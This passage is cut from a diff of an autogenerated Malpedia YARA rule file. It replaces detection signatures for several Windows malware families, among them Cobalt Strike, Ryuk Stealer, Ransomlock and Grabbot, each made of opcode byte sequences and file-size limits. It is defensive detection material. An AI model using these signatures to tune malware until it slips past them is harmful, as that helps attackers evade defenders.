-		$sequence_7 = { 8955f8 894dfc e8???????? 8b0d???????? 33d2 }
-		$sequence_8 = { 889591feffff 888dc9feffff 888d81feffff b920000000 c60000 }
-		$sequence_9 = { e8???????? 2467 0fa1 ee d5d8 e9???????? 8c9f381b40b1 }
+		$sequence_0 = { 899c2480400000 897c2418 3bc7 7d42 8b5c2410 e8???????? 8b5c2414 }
+		$sequence_1 = { 8b5104 895008 8b09 894804 833801 }
+		$sequence_2 = { 83a588fdffff00 899d8cfdffff c68578fdffff00 c645fc05 ff15???????? 50 8d85e8fdffff }
+		$sequence_3 = { 8b8574f7ffff 8985c0fdffff 8b8578f7ffff 8985c4fdffff 6804010000 8d858cf9ffff 50 }
+		$sequence_4 = { 83e800 747a 48 7459 48 0f858c000000 8b3d???????? }
+		$sequence_5 = { ff7508 e8???????? 8bd8 53 57 }
+		$sequence_6 = { 75f2 8b35???????? 57 57 ffd6 898570ffffff 3bc7 }
+		$sequence_7 = { 663bcf 75ed e9???????? 83f806 751a 33c0 }
+		$sequence_8 = { c1e606 03348560e90110 c745e401000000 33db 395e08 }
+		$sequence_9 = { 3bf3 7405 e8???????? 6a05 ff15???????? 399d68deffff }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 276480
 }
-rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
+rule MALPEDIA_Win_Grabbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dffdbcb2-bd98-5c78-b119-218bf0b8f1f8"
+		id = "73c12bd4-295c-5729-9e60-823ca8abaa15"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shady_hammock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shady_hammock_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grabbot_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "eb81523b23e33f9ac426471f12cb50726588d21942b2b73e8ff2883c6fa0b314"
+		logic_hash = "c79f2285c80f8ba1c50729904e8ec53f7fa2031a70a10d12a2683fdce4ed7a23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116030,32 +115996,38 @@ rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7203 488b01 488d0c10 488bfe 492bf9 4c8bc7 }
-		$sequence_1 = { 488bcd e8???????? 498d5701 41c6042c00 4881fa00100000 7218 }
-		$sequence_2 = { e8???????? 4c8b5368 488d4d2f 48837d4710 0f93c2 480f434d2f 4c8b4d3f }
-		$sequence_3 = { 3bc7 0f843e010000 0fb6f8 e9???????? 0f57c0 }
-		$sequence_4 = { 7453 488b5318 4883fa10 7205 488b0b }
-		$sequence_5 = { 0bc1 89442408 0fae542408 c3 488bc4 53 }
-		$sequence_6 = { 747e 8b82b0000000 4803c8 4903c9 4a8d1408 }
-		$sequence_7 = { 4883781810 7203 488b00 41b80a000000 488bd0 488bcf e8???????? }
-		$sequence_8 = { eb2c 498bcf 488bc3 48d1e9 }
-		$sequence_9 = { 48895c2408 4889742410 48897c2418 488bd9 4c8bc9 482b5a30 }
+		$sequence_0 = { 83f85a 770b 83f841 7206 83c020 0fb7c0 83c202 }
+		$sequence_1 = { 83f85a 770d 83f841 7208 83c020 }
+		$sequence_2 = { 50 6a04 ff75e8 ff75dc }
+		$sequence_3 = { 813850450000 7523 0fb75004 bb64860000 663bd3 7506 }
+		$sequence_4 = { b905000000 3907 7707 83c704 e2f7 }
+		$sequence_5 = { 663907 7566 8b473c 03c7 813850450000 }
+		$sequence_6 = { c3 68d0035c09 e8???????? 50 e8???????? ffe0 }
+		$sequence_7 = { e8???????? 59 81c480000000 50 8bf1 e8???????? e8???????? }
+		$sequence_8 = { 56 ffd0 33c9 66894c37fe }
+		$sequence_9 = { 7428 8b0d???????? 8908 8b0d???????? 894804 8b0d???????? }
+		$sequence_10 = { 894808 8b0d???????? 89480c e9???????? 33c0 }
+		$sequence_11 = { 8d45f0 99 52 50 8b451c 99 }
+		$sequence_12 = { 57 8d7c000c 57 e8???????? }
+		$sequence_13 = { e8???????? 85c0 56 0f9fc3 e8???????? 83c414 }
+		$sequence_14 = { 50 ff15???????? a3???????? 85c0 7505 83c8ff }
+		$sequence_15 = { 8bf0 85f6 741d 8d4601 }
 
 	condition:
-		7 of them and filesize < 635904
+		7 of them and filesize < 1335296
 }
-rule MALPEDIA_Win_Darktequila_Auto : FILE
+rule MALPEDIA_Win_Simda_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b84bd16-ca3f-5431-937c-08f7f5b85ab2"
+		id = "27bb9bc3-3123-59db-b496-71430a74b58c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darktequila_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.simda_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "33ae748771a6cb26fc0c416897ca1e808c4fe1a22bddffab51a85bc073a3f977"
+		logic_hash = "e9f68a5c932750dc8dc15c371abf1fcbed20271ad653ffccba6ba46621ea82a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116069,34 +116041,34 @@ rule MALPEDIA_Win_Darktequila_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 894604 8bc6 5e c3 8bff }
-		$sequence_1 = { 33c5 8945fc 33c0 53 8bd9 33c9 }
-		$sequence_2 = { 83c00d b901000000 ba???????? e8???????? }
-		$sequence_3 = { 894df8 e8???????? 83c410 8bf3 e8???????? }
-		$sequence_4 = { 40 83f838 72dc b8???????? c3 33d2 3915???????? }
-		$sequence_5 = { 83f818 72dc b8???????? c3 }
-		$sequence_6 = { 85c0 7466 8b4b0c 8b5310 }
-		$sequence_7 = { 884ddf 8945e0 8945e4 8945e8 8945ec }
-		$sequence_8 = { 4a 7419 83ea02 753c 8b4508 }
-		$sequence_9 = { e8???????? 85c0 742e a1???????? 8d5001 }
+		$sequence_0 = { 8955ec 897de0 3bce 0f8278feffff 5b }
+		$sequence_1 = { 83c424 33c0 668945d0 8845fe }
+		$sequence_2 = { 8b85e8feffff 85c0 7505 8d41ff eb0f 83f801 }
+		$sequence_3 = { 33f6 68ff000000 8d85f1feffff 56 50 }
+		$sequence_4 = { 83ec24 53 56 57 50 6800040000 }
+		$sequence_5 = { 83c408 8945f0 85c0 7508 6a01 }
+		$sequence_6 = { 8bf8 0faf7dfc c1e210 0b55f8 3bfa }
+		$sequence_7 = { b910000000 be???????? 8d7db4 f3a5 66a5 }
+		$sequence_8 = { 8bd1 c1ea10 8955ec 8bf8 }
+		$sequence_9 = { 85c0 75dd 8b4d0c 8bc3 2bc2 }
 
 	condition:
-		7 of them and filesize < 1827840
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
+rule MALPEDIA_Win_Tmanger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aab8f287-0819-52fa-8447-761ad2e94a18"
+		id = "790b1a6e-9331-5562-a8a4-895a06f4f290"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobalt_strike_auto.yar#L1-L289"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tmanger_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "6946d3d1b89ab18cd12b0ef58b50d5d28d283228462e1be6da78da0efd49ddbb"
+		logic_hash = "747dcecd7ac42c73ae2cafbcc412928abf59ab04c5fc33f549cfda9aa11d6334"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116108,54 +116080,32 @@ rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc7 750d ff15???????? 3d33270000 }
-		$sequence_1 = { e9???????? eb0a b801000000 e9???????? }
-		$sequence_2 = { ff15???????? 85c0 741d ff15???????? 85c0 7513 }
-		$sequence_3 = { ff7608 83660400 e8???????? 59 }
-		$sequence_4 = { ff15???????? 59 a807 7501 4e }
-		$sequence_5 = { ff75f8 ff75fc ff15???????? 83c40c eb15 ff75fc }
-		$sequence_6 = { ff7604 ff75fc ff15???????? 83c410 }
-		$sequence_7 = { ff15???????? 59 c70601000000 e9???????? }
-		$sequence_8 = { ff7604 e8???????? 014604 83c410 014608 }
-		$sequence_9 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
-		$sequence_10 = { e9???????? 833d????????01 7505 e8???????? }
-		$sequence_11 = { 8bd0 e8???????? 85c0 7e0e }
-		$sequence_12 = { f7d8 1bc9 4423f9 488d4ddf e8???????? }
-		$sequence_13 = { c1ef03 8bc7 ffc0 81ff80000000 720b eb05 }
-		$sequence_14 = { 488bd7 488bcf e8???????? 85c0 7569 498bcf }
-		$sequence_15 = { 83f801 750e e8???????? 4c8d2dca1e0000 eb16 e8???????? 8bd8 }
-		$sequence_16 = { 7409 c745f040000000 eb07 c745f004000000 }
-		$sequence_17 = { 52 8b4508 8b08 ffd1 85c0 }
-		$sequence_18 = { 837d0c00 7422 837d1000 761c 837d1404 }
-		$sequence_19 = { 6a20 8b4d10 51 8b550c 52 }
-		$sequence_20 = { 8b5514 52 8b450c 8b4850 }
-		$sequence_21 = { 56 57 8b4510 8b4850 }
-		$sequence_22 = { 8b4510 8b4850 8b550c 8d440ac0 }
-		$sequence_23 = { b940000000 f3aa 5f 5e }
-		$sequence_24 = { 488b842490000000 8b4050 488b8c2488000000 488d4401c0 }
-		$sequence_25 = { c644246856 c644246969 c644246a72 c644246b74 c644246c75 }
-		$sequence_26 = { 4889442418 48837c242800 0f8496010000 488b0424 0fb700 66c1e80c }
-		$sequence_27 = { 4803c8 488bc1 4889442408 488b442410 8b4004 4883e808 33d2 }
-		$sequence_28 = { 488bc1 4889442450 488b442450 4883c002 488b7c2420 }
-		$sequence_29 = { 488b842490000000 ff5008 488b8c2490000000 48894110 488d542458 488b4c2420 }
-		$sequence_30 = { 488b0c24 0fb709 6623c8 0fb7c1 0fb7c0 488b4c2408 488b0401 }
-		$sequence_31 = { c644247600 488d4c2428 488b842490000000 ff10 4889442420 }
+		$sequence_0 = { c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 }
+		$sequence_1 = { c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
+		$sequence_2 = { c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d }
+		$sequence_3 = { c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 }
+		$sequence_4 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 }
+		$sequence_5 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb }
+		$sequence_6 = { c74145aed72316 c74149ff663a9d c7414dd22a7e91 c741510f9f2997 c7415565449eac }
+		$sequence_7 = { c741510f9f2997 c7415565449eac c741594d68b93a c7415d382cd7bd }
+		$sequence_8 = { c7410c16d9fdf8 c741103a71c135 c74114c2a02ab0 c74118d95dc845 }
+		$sequence_9 = { c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d c7413893c82e55 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 8252416
 }
-rule MALPEDIA_Win_Ngioweb_Auto : FILE
+rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c36bfdd-8dfc-5ce2-bea9-f354084a9adc"
+		id = "5ce42c56-7196-5dab-bbf5-f82410a1858c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ngioweb_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ryuk_stealer_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "63470bb29a6555e27026baafc523ffac609f0c101ccb6a3d82cc98debb8823c5"
+		logic_hash = "577b17a6c0c9d94113328d94349dd787eb11b2a9bf82279881b6744cc074e6ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116169,32 +116119,32 @@ rule MALPEDIA_Win_Ngioweb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bfb 763d 33c0 395d14 8d747efe 0f95c0 894508 }
-		$sequence_1 = { 7569 8b4510 2b45cc 6a16 6a05 50 ff750c }
-		$sequence_2 = { 03c0 50 56 e8???????? 57 56 8945e8 }
-		$sequence_3 = { 8b442404 85c0 7408 8b809c000000 eb02 33c0 c20400 }
-		$sequence_4 = { 50 6a10 8d4604 50 e8???????? eb46 80fa03 }
-		$sequence_5 = { 51 ffd0 8b5f14 68159fa331 56 e8???????? 53 }
-		$sequence_6 = { ff742408 e8???????? 6a00 56 e8???????? 33c0 5e }
-		$sequence_7 = { ff7508 e8???????? 85c0 7531 ff7508 e8???????? 6a00 }
-		$sequence_8 = { 66c745f86900 66c745f67600 66c745f46700 66c745f26200 66c745f06400 668975ee 66c745ec4700 }
-		$sequence_9 = { 395d0c 750d 8b85d8fdffff 85c0 8945fc 7519 }
+		$sequence_0 = { 8bcb e8???????? 3bc7 7552 }
+		$sequence_1 = { 05???????? 50 8d85b4fdffff 50 e8???????? }
+		$sequence_2 = { 8bcb 0f44f2 42 8d7902 }
+		$sequence_3 = { 83f801 7410 83ff01 755d }
+		$sequence_4 = { 8a443706 3c2f 7404 3c2d }
+		$sequence_5 = { b9a0860100 f7f9 81c2f8240100 52 ff15???????? }
+		$sequence_6 = { 668945ec 8945ee 668945f2 8d45e0 50 }
+		$sequence_7 = { 81c2f8240100 52 ff15???????? 46 }
+		$sequence_8 = { e8???????? 99 b9a0860100 f7f9 81c2f8240100 52 ff15???????? }
+		$sequence_9 = { 75f4 a1???????? 8907 eb38 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Atmosphere_Auto : FILE
+rule MALPEDIA_Win_Ransomlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4a1cda9-16c6-5553-aa27-a4261bb4c5d6"
+		id = "1d9f68b5-bde6-5cf8-8d3e-ce79b7904787"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmosphere_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomlock_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "cdc6f699a9e6edd17b2609c792a1b077712e73bd58ad4e35ab98f645501a4fd4"
+		logic_hash = "ae6cb71ec68ff479f995cb168a9a85eebf5d8c257dade2208e4eb2660cdda6fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116208,32 +116158,32 @@ rule MALPEDIA_Win_Atmosphere_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a12 50 8b11 ff12 }
-		$sequence_1 = { c20400 56 57 8b7c240c 8bf1 57 ff15???????? }
-		$sequence_2 = { 56 f6d8 1bc0 57 83e002 }
-		$sequence_3 = { 894114 b001 c20400 8b4114 }
-		$sequence_4 = { 57 8bce ff502c 84c0 }
-		$sequence_5 = { 8b5104 668b0402 8b542404 668902 }
-		$sequence_6 = { ff15???????? 56 8bf8 ff15???????? 83c410 8bc7 }
-		$sequence_7 = { 83ec10 8bc4 89642410 50 }
-		$sequence_8 = { 57 8bf9 6a2e e8???????? }
-		$sequence_9 = { 6a0a 50 8b11 ff12 }
+		$sequence_0 = { 8b5120 56 50 ffd2 85c0 }
+		$sequence_1 = { 51 50 66894802 ff15???????? 53 8d9decfbffff }
+		$sequence_2 = { 8b5120 56 50 ffd2 85c0 7807 c745ec01000000 }
+		$sequence_3 = { 83c0ec 52 50 8b01 ffd0 }
+		$sequence_4 = { 8d45b8 50 ff15???????? 6804010000 68???????? ff15???????? e9???????? }
+		$sequence_5 = { 53 53 6a01 68???????? ff15???????? 8bf0 85f6 }
+		$sequence_6 = { 8be5 5d c3 83f801 7408 }
+		$sequence_7 = { 8b7510 8bce ba???????? e8???????? 85c0 7414 8b5514 }
+		$sequence_8 = { 8b5104 57 ffd2 5f 5e }
+		$sequence_9 = { 8d95a0f9ffff 68???????? 52 ffd3 83c414 8dbdb0fdffff 32c0 }
 
 	condition:
 		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Fancyfilter_Auto : FILE
+rule MALPEDIA_Win_Sfile_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "975f685e-f179-537e-9fa3-85eadc815e28"
+		id = "e614c85b-182e-5624-9633-dd84a183f73d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fancyfilter_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sfile_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "d344d0526413aed72b15674c72f5f795f13d63b4791189f46999d274791cb577"
+		logic_hash = "4284a47c1e2e07fe055fa45f368d41b804eaf7390d53426d31beb69dd3e007f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116247,32 +116197,32 @@ rule MALPEDIA_Win_Fancyfilter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 891d???????? 891d???????? b001 5b }
-		$sequence_1 = { ff15???????? 83c420 83f803 7409 }
-		$sequence_2 = { 66833800 7404 b001 eb02 }
-		$sequence_3 = { 740f 8d4f20 51 50 ff15???????? }
-		$sequence_4 = { 83f80a 7305 83c030 eb03 83c057 8801 }
-		$sequence_5 = { 51 50 ff15???????? 8b36 }
-		$sequence_6 = { a1???????? 83c012 50 ff15???????? }
-		$sequence_7 = { 8d4f20 51 50 ff15???????? 8b36 }
-		$sequence_8 = { b805400080 c20400 56 8b742408 8b4618 85c0 }
-		$sequence_9 = { 83c030 eb03 83c057 8801 49 }
+		$sequence_0 = { 52 8b4514 50 e8???????? 83c408 eb49 }
+		$sequence_1 = { 8b55f8 2b55e8 d1fa 8955e4 8b45e4 }
+		$sequence_2 = { 8b55fc c7422000000000 8d45fc 50 }
+		$sequence_3 = { 7433 6aff 8b4dfc 8b5118 52 }
+		$sequence_4 = { 8b4818 51 ff15???????? 8b55fc 8b421c }
+		$sequence_5 = { 8d8db8fdffff 51 e8???????? 83c41c 837dc800 7507 }
+		$sequence_6 = { 8b4244 8b4d08 8b5120 8b4008 }
+		$sequence_7 = { 8b5158 52 e8???????? 83c404 8b4510 }
+		$sequence_8 = { 8b751c 8b4d20 f3a4 837d0802 }
+		$sequence_9 = { 8bec 83ec2c 56 57 c745f400000000 }
 
 	condition:
-		7 of them and filesize < 169984
+		7 of them and filesize < 588800
 }
-rule MALPEDIA_Win_Owlproxy_Auto : FILE
+rule MALPEDIA_Win_Mail_O_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63e3635a-b438-5b14-b4eb-af7ffdbef122"
+		id = "5d523861-cfbe-53c5-a1e3-510491b0431d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.owlproxy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mail_o_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "53d3a09278d24d3abda5835aa7f0dd4ef8496154e71ad2a30bd173f4868edb33"
+		logic_hash = "0523be98b7e34057335b62be8aafee77bb16a4b5cb13de84130c24ec4689c31e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116286,34 +116236,34 @@ rule MALPEDIA_Win_Owlproxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4908 410fb7f0 488bfa 4c8d442450 488d542458 c744245014000000 ff15???????? }
-		$sequence_1 = { 486bc000 488d0d42330200 8b542430 48891401 488d0d0b810100 e8???????? }
-		$sequence_2 = { 55 57 4156 488da808feffff 4881ece0020000 48c7442478feffffff 48895818 }
-		$sequence_3 = { e8???????? 4c8b742440 4c3b742448 7435 }
-		$sequence_4 = { 2bf3 448bc6 488bd3 488d8c2430010000 e8???????? 448b8424f8000000 }
-		$sequence_5 = { 498936 49895e08 49897e10 4883bd8800000010 7209 488b4d70 e8???????? }
-		$sequence_6 = { 415e 415d 415c 5f c3 488d0d2c290200 e8???????? }
-		$sequence_7 = { 480f4355b8 4533c0 488b4da8 ff15???????? 895db0 4c8d25f53c0200 }
-		$sequence_8 = { 4883ec20 488d0d53580100 ff15???????? 488d1566580100 488bc8 488bd8 ff15???????? }
-		$sequence_9 = { 4885db 0f8480000000 410fb60437 8803 eb77 483bdf 756a }
+		$sequence_0 = { eb09 b801000000 66894348 ba03000000 897320 488d8b70010000 e8???????? }
+		$sequence_1 = { c781e806000002000000 b801000000 4883c438 c3 c744242892070000 ba2f000000 41b96e000000 }
+		$sequence_2 = { eba9 488b5008 4c8d442440 488d0debe00e00 488b5208 e8???????? eb8e }
+		$sequence_3 = { b800010000 e8???????? 482be0 488b05???????? 4833c4 48898424d0000000 4c8ba42450010000 }
+		$sequence_4 = { e8???????? 8bf0 83f8ff 0f85befeffff 33c0 488b5c2470 488b6c2478 }
+		$sequence_5 = { 74bb 488d8b00080000 e8???????? 85c0 7457 488b9388000000 488bcb }
+		$sequence_6 = { eb04 488b45d8 8b0a 4d8bfe 8bc0 498bd5 4c8b6da8 }
+		$sequence_7 = { 85c0 0f8ec7000000 0f1f4000 488b8bf8000000 8bd5 e8???????? 488bf0 }
+		$sequence_8 = { c744242073000000 4c8d0d028e1100 8d4f06 448d420b e8???????? 33c0 488b5c2440 }
+		$sequence_9 = { eb1a 488bcb e8???????? 85c0 7560 4889b3500d0000 4889b350160000 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 5985280
 }
-rule MALPEDIA_Win_Sathurbot_Auto : FILE
+rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40f6d317-e340-5c28-bf05-1e34ed3b7c05"
+		id = "db997ae6-872c-5121-a308-2ff2cf7909e7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sathurbot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dizzyvoid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dizzyvoid_auto.yar#L1-L234"
 		license_url = "N/A"
-		logic_hash = "73420e104486f36b90bb2733cf04075c1d18a3e103b83a2dc2d22ad64ff4f0ae"
+		logic_hash = "ee47377d576371e1f242f6668080ed5eb3d7f4fc6edffaf4a1f51714c1f6dc67"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116325,34 +116275,48 @@ rule MALPEDIA_Win_Sathurbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b84b7e8b0c 0f45c3 }
-		$sequence_1 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 bfcc456d5f b8dd72d480 }
-		$sequence_2 = { e9???????? 81fe44b0cddc 7f16 81fe7313fbac 0f850dffffff be80c3aea4 e9???????? }
-		$sequence_3 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d1e835c1 b93dd672c9 }
-		$sequence_4 = { ebd8 81fa06cfb547 7f27 81fab0570bce 7f30 81fabe1990c9 75c2 }
-		$sequence_5 = { ebfe 55 89e5 53 56 83ec02 a1???????? }
-		$sequence_6 = { eb3e 897c2408 8b450c 89442404 893424 e8???????? 8945f0 }
-		$sequence_7 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8aebf6a24 0f45c3 }
-		$sequence_8 = { e9???????? c744240400000000 c7042401000000 89f1 e8???????? 83ec08 8b442454 }
-		$sequence_9 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b86e66c620 b9a93409fe }
+		$sequence_0 = { 488b8bd0000000 4885c9 7403 ff5350 }
+		$sequence_1 = { 41c1e11c c1e904 4403c9 498bc8 48c1e902 418bc1 48c1e802 }
+		$sequence_2 = { 48b865210b59c84216b2 4c2bc1 49f7e8 4903d0 }
+		$sequence_3 = { 48b865210b59c84216b2 48f7e9 4803d1 48c1fa07 }
+		$sequence_4 = { 48895c2430 44897c2428 48896c2420 448bce }
+		$sequence_5 = { 4889442428 c7442420f8080000 4c8d8da0050000 41b806000000 }
+		$sequence_6 = { 488b8bc8000000 ff5350 90 488b8bd0000000 ff5350 90 488b8bd8000000 }
+		$sequence_7 = { 0f118980000000 48898190000000 488d0557e5ffff 498b0b }
+		$sequence_8 = { 8bec 81ec34040000 53 56 57 8dbdccfbffff b90d010000 }
+		$sequence_9 = { 8b8d90fcffff 51 e8???????? 83c40c 8bf4 }
+		$sequence_10 = { 7320 8b859cfcffff 0fb68c05a8fcffff 83f104 8b959cfcffff }
+		$sequence_11 = { 8b4dfc 33cd e8???????? 81c434040000 3bec }
+		$sequence_12 = { 8bf4 ff9590fcffff 3bf4 e8???????? 33c0 52 8bcd }
+		$sequence_13 = { 8dbdccfbffff b90d010000 b8cccccccc f3ab a1???????? 33c5 8945fc }
+		$sequence_14 = { a1???????? a3???????? a1???????? c705????????2a134100 }
+		$sequence_15 = { c705????????2a134100 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
+		$sequence_16 = { e8???????? c70016000000 e8???????? ebb4 c745e4700a4100 a1???????? }
+		$sequence_17 = { 83e908 8d7608 660fd60f 8d7f08 8b048de81f4000 }
+		$sequence_18 = { 59 8365fc00 8b049d601c4100 f644380401 740b }
+		$sequence_19 = { c3 8b04c53cb04000 5d c3 55 8bec }
+		$sequence_20 = { 33f6 e8???????? 83c404 8bf8 6800100000 }
+		$sequence_21 = { 8d44242c 50 57 46 ffd3 85c0 75f3 }
+		$sequence_22 = { 888690f54000 46 ebe5 ff35???????? }
+		$sequence_23 = { 8b04b5601c4100 0500080000 3bc8 7324 66c74104000a }
 
 	condition:
-		7 of them and filesize < 2727936
+		7 of them and filesize < 479232
 }
-rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
+rule MALPEDIA_Win_Gopuram_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0b0b352-347f-55af-9ff0-490ede9b4160"
+		id = "b03e678a-6ea1-5889-b388-a101df87e17a"
 		date = "2026-01-05"
